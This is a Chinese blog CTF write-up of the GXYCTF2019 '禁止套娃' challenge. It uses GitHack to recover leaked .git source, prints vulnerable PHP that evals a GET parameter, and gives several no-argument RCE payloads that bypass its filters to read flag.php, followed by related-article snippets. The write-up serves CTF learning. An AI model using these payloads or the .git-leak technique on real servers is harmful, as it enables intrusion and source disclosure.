一天一道ctf 第21天(无参RCE GitHack)

最新推荐文章于 2024-03-13 20:14:03 发布
最新推荐文章于 2024-03-13 20:14:03 发布
阅读量435 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scrawman/article/details/115602178
版权

[GXYCTF2019]禁止套娃
.git源码泄露,这里我用dirsearch是没扫出来这个文件的。
用GitHacker这个工具可以查看泄露的.git文件,linux里(我用的是kali)命令行输入git clone https://github.com/lijiejie/GitHack.git 下载,进入GitHack文件夹,命令行输入python GitHack.py http://e3899c1b-f6d8-4f65-8408-46b968e41c33.node3.buuoj.cn/.git/就能得到index.php文件

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

三层过滤,第一个if过滤常用的伪协议,第二个if只能通过无参数的函数,第三个if过滤了一些常见的字符。执行语句是eval($_GET['exp']),说明是无参数RCE,通俗点来说就是因为过滤只能通过无参数的函数,所以我们要用函数套函数的方式找到flag,如a(b(c()))。也就是题目标题中说的禁止套娃的意思。

先看第一个payload:?exp=print_r(scandir(current(localeconv())));
localeconv() 函数返回一包含本地数字及货币格式信息的数组,该数组第一个元素是.,正好作为scandir()函数的参数
在这里插入图片描述

current() 函数返回数组中的当前元素的值
scandir()函数扫描目录
在这里插入图片描述
我们看到flag在倒数第二个数组元素里
因此我们用第二个payload:
?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));
array_reverse()函数以相反的元素顺序返回数组
next() 将内部指针指向数组中的下一个元素
highlight_file()输出文件内容
在这里插入图片描述

ps.在网上还查到了其它几种读取flag.php的方法

?exp=hightlight_file(array_rand(array_flip(scandir(current(localeconv())))));

array_flip() 函数用于反转/交换数组中的键名和对应关联的键值
array_rand() 函数返回数组中的随机键名,只要多试几次就能返回flag

?exp=readfile(session_id(session_start()));

session_start()是让php开启session对话,session_id()返回session的ID
并且在请求头中设置cookie:PHPSESSID=flag.php, connection: keep-alive
在这里插入图片描述

scrawman
关注
【网络安全 | CTF】攻防世界 php_rce详析
等风来
05-22 5719
PHP RCE 指的是通过远程代码执行漏洞(Remote Code Execution)来攻击 PHP 程序的一种方式。简单来说,由于PHP应用程序没有正确处理外部输入数据(如用户提交的表单、请求参数等),此时通过某些手段向 PHP 应用程序中注入恶意代码,然后通过这些恶意代码实现对受攻击服务器的控制。由上图可知,flag字段储存在flag文件夹下的flag文件中。使用thinkphp 5.1.payload进行尝试,根据提示,使用5.0.20版本的Payload。说明命令执行成功,接着抓取flag即可。
无参rce.md
04-01
记录一下,关于这次比赛的 wp >.< 并向大佬们积极学习 >.< 顺便混点分
CTFweb无参RCE
遇事不决冲冲冲
07-25 2988
1 打开目便是源代码,通过a的参数来实现RCE <?php #-*-coding: utf-8 -*- //flag in show_flag.php if(isset($_POST['a'])){ $a=$_POST['a']; if (!(preg_match("/[0-9]|\.|data|phar|glob|\*|system|shell_exec|shell|php|\`/i", $a))) { eval($a); } }else{ hig
Byte CTF boring_code(fuzz,无参RCE)
a3320315的博客
11-09 1939
0x01 贴出代码 <?php function is_valid_url($url) { if (filter_var($url, FILTER_VALIDATE_URL)) { if (preg_match('/data:\/\//i', $url)) { return false; } return true; } return false; } if (is...
CTF-WEB-无数字字母rce
m0_74317362的博客
11-17 316
无数字字母rce,就和他的名字一样,就是不利用字母和数字构造webshell,从而绕过对方的过滤手段。对于无数字字母rce可以处理的过滤手段如下很明显,在这个程序中,数字和字符全部被过滤掉了,便排除了原来的手段。无数字字母rce的原理是什么呢,是利用各种非数字字母字符,经过各种变换,比如异或,取反,自增,构造成单个字母字符,然后把单个字母字符拼接成原构造的payload。
无字母数字rce(ctfshow web入门56)
L1ni01
11-01 3670
无字母数字rce(ctfshow web入门56) 我们根据这一直接进入主 //web56 <?php // 你们在炫技吗? if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){ system($c); } }else{ highlight_file(__FILE__); } 过滤
githack泄露利用_softlysu3_ctfgithack_githack_CTF之.git泄露_githack下载_
10-03
GitHack 是一个针对 `.git` 目录泄露的利用工具,主要用于网络安全竞赛(CTF,Capture The Flag)中的Web安全领域。`.git` 目录是Git版本控制系统的一部分,通常包含项目的完整历史记录和敏感信息,如源代码、配置...
bfengj#CTF#thinkphp5.0.24反序列化rce1
07-25
thinkphp5.0.24反序列化rceModel是抽象类protected $append = [];// $value值,作为call函数引用的第二变量p
GitHack改进版(git源码泄露恢复工具)
09-26
GitHack改进版是一款专为CTF(Capture The Flag)竞赛设计的工具,主要用途是对不慎泄露的Git源码进行恢复,以防止敏感信息落入他人之手。Git是世界上最流行的分布式版本控制系统,广泛应用于软件开发中,但同时也...
githack-master.zip
08-26
GitHack是一款专为解决Git泄露问而设计的工具,尤其在CTF(Capture The Flag)竞赛中被广泛使用。CTF是一种网络安全领域的竞技活动,参与者通过解密、漏洞挖掘、逆向工程等技术来获取“旗标”,即比赛的关键信息。...
ctf随笔(5) Githack简单运用
ma_nong_的博客
10-17 1115
打开目,首页一篇没啥用的开场,仔细查看会发现有这样一个网页 这个网页就有很明显的提示:git,php 首先去看看网页的git,果不其然有我们需要的东西 但是直接点击下载之后,出现的全是乱码,这个时候就需要githack一下了 格式:python GitHack.py http://xxx.xxx.xxx.xxx/.git 这样,一大堆代码我们就获得了 打开文件夹,看看代码,需要注意的就是一下部...
CTF--Git漏洞
woshisz0413的博客
11-27 1636
思路:awvs扫描网站后发现存在git文件夹后使用githack githack使用方法:在githack目录下 python GitHack.py http://*******/.git(注意git前一般有个点) 运行完成后在githack目录下生成目标文件夹 ...
CTF目记录4(git泄露)
kkzzjx
05-20 2332
掀桌子 菜狗截获了一份报文如下c8e9aca0c6f2e5f3e8c4efe7a1a0d4e8e5a0e6ece1e7a0e9f3baa0e8eafae3f9e4eafae2eae4e3eaebfaebe3f5e7e9f3e4e3e8eaf9eaf3e2e4e6f2,生气地掀翻了桌子(╯°□°)╯︵ ┻━┻ 发现只有数字0-9 a-f 考虑为16进制 2位一组转ASCII 注意-128 让所有的数值都落在ascii范围内0-127 k="c8e9aca0c6f2e5f3e8c4efe7a1a0d4e8e5a
命令执行.无参RCE
E1even的博客
05-25 1276
linux是操作系统,是服务器操作系统,目前大多数都是采用linux服务系统 主要原因就不多说了 命令执行和代码执行 命令执行实在LINUX终端里面进行执行的,功能强大 代码执行仅仅是存在与代码中,进行代码执行,个人认为执行的也就仅仅是简单的print内容 核心是命令执行,而非代码执行 既然说到命令执行是在LINUX终端进行的,那么我们需要调用LINUX下的命令执行函数,比如常见的: system shell_exec exec 这些常见的命令执行函数 而我们常见的代码执行函数,最多的就是exec,我们很
CTFHub Web 信息泄露 Git泄露 Stash
m0_51319369的博客
04-29 1887
尝试了dirsearch、GitHacker、GitHack三种工具,扫描路径后,都没有找到 stash ,不知道为什么,特此记录。 官方解法一: 1,执行 git stash list 发现有 stash 2,执行 git stash pop 发现从 git 栈中弹出来一个文件,这个文件的内容就是 flag 官方解法二: 1,如果你使用的 GitHack 工具执行完 git stash show 之后没有显示 stash 记录,那么不妨来尝试这个方法 查看 .git/refs/stash 找到 sta
githacker安装详细教程,linux添加环境变量详细教程(见标三)
这个博主不懒,但Ta什么也没写~(私信互关24小时必回)
01-30 3614
笔者是ctf小白,这两也是遇到.git泄露的目,需要工具来解决问,在下载和使用的过程中也是遇到很多问,写此篇记录经验,以供学习在本篇标三中有详细介绍了的操作教程,以供学习。
ctfhub-git泄露-log
SinAlone的博客
07-02 653
提示:当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。 这明确提示有git泄露漏洞,显然你需要一个工具githack 1.python2可以用githack ------windos的话去网站上下载 https://github.com/lijiejie/GitHack 上不去github就用镜像网站 https://git.sdut.me/lijiejie/GitHack -------linux可以
gwb-crypto-1
zip471642048的博客
12-06 1215
crypto1 拿到目直接base64 就是普通共模攻击,编写脚本直接秒杀。 import gmpy2 import libnum e1 = 667430104865289 e2 = 537409930523421 c1 = 65902678572727724179176496573968997182712063317082289120453094068199325419989688382177808529042322217887334005084504796397220804856167255176
CTF中的GIT泄露
最新发布
zy_mpy的博客
03-13 1021
由于本人也是一名ctf的萌新,所以笔记比较易懂但又不可避免的浅显,如有错误,欢迎各路大神来指正。先简单介绍一下GitGit是一个开源的分布式版本控制系统,在执行git init初始化目录的时候,会在当前目录下自动创建一个.git目录,用来记录代码的变更记录等。发布代码的时候,如果没有把,git这个目录删除,就直接发布到了服务器上,攻击者就可以通过它来恢复源代码,这就引起了git泄露漏洞。处理Git泄露的目时,需要用到scrabble,dirsearch和gihack三个工具。一、常规git泄露常规 gi
CTF挑战:远程命令执行(RCE)与Web安全策略
"了解CTF(Capture The Flag)竞赛中关于远程命令执行(RCE)的概念,以及如何在Web安全场景下利用和防范此类漏洞" 远程命令执行(RCE)是一种严重的安全漏洞,它允许攻击者通过Web接口执行任意系统命令。当服务器...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值